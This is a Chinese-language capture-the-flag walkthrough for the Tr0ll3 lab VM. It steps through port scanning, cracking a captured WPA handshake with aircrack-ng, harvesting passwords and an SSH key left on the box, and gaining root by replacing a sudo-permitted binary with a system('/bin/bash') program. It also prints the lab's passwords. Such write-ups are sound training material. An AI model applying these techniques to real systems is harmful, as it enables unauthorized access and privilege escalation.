Tr0ll3靶机通关
一、主机发现
arp-scan -l
得到靶机ip为192.168.55.155
二、拿到低权限账号
靶机就开放了22端口,去靶机页面一看,给出来了低权限的账号密码
ssh start@192.168.55.155
成功登陆
三、提权
3.1靶机信息收集
寻找定时任务
crontab -l
没找到定时任务
找一下suid命令
find / -perm -4000 -print 2>/dev/null
发现该用户不能使用sudo命令
3.2登陆wytshadow用户
寻找可读可写可执行的文件
find / -type f -perm -0777 -print 2>/dev/null
利用scp命令将这两个文件下载到kali本地中
scp start@192.168.55.155:/var/log/.dist-manage/wytshadow.cap .
scp start@192.168.55.155:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt .
其中这个txt文件看着像字典
这个cap文件用wireshark打开
这不是常规的通讯数据包,其中的802.11是无线协议通信
尝试进行爆破
aircrack-ng -w gold star.txt wytshadow.cap
成功爆破出来了密码
尝试登陆wytshadow用户
ssh wytshadow@192.168.55.155
gaUoCe34t1
成功登陆
3.3登陆genphlux用户
发现可以使用nginx命令
启动一下nginx服务试试
sudo service nginx start
systemctl status nginx.service
使用namp扫描一下端口,看看nginx开放的是哪个端口
nmap --min-rate 10000 -p- 192.168.55.155
发现是8080端口开放
使用火狐浏览器访问
发现访问不到
寻找配置文件查看原因
在/etc/nginx/sites-available目录下的default文件找到了答案
需要使用lynx进行查看
注:
lynx:是一个文本模式的网页浏览器
安装lynx
sudo apt-get install lynx
查看网页信息
lynx http://192.168.55.155:8080
又找到了一个账户
genphlux
HF9nd0cR!
使用该账户进行登陆
ssh genphlux@192.168.55.155
HF9nd0cR!
发现该用户可以使用apache2
启动apache2后,发现80端口打开
火狐还是访问不到
试试lynx
也没有访问到信息
继续信息收集了
3.4登陆maleus用户
在该用户目录下找到了ssh私钥
尝试登陆
先将该密钥下载到kali本机中
scp genphlux@192.168.55.155:/home/genphlux/maleus .
登陆maleus用户
chmod 600 maleus
ssh -i maleus maleus@192.168.55.155
继续进行信息收集
在.viminfo中找到了密码信息:B^slc8I$
3.5提权
继续查找sudo命令
此文件就在该用户的目录下
此时我们要做的就是修改该文件的内容,将提权语句插入其中
mv dont_even_bother dont_even_bother.c
然后编辑该文件
int main ()
{
system("/bin/bash");
}
编译该文件
gcc -o dont_even_bother dont_even_bother.c
报错了,让我们加入参数
gcc -o dont_even_bother dont_even_bother.c -Wno-implicit-function-declaration
注:
-Wno-implicit-function-declaration 是 GCC 编译器的一个选项,其作用是关闭 “隐式函数声明” 的警告。当你在编译命令里添加这个选项后,编译器在遇到隐式声明的函数时,就不会再发出警告。所以,使用这个命令编译时,之前的警告信息将不会再显示。
然后执行该文件即可
成功提权!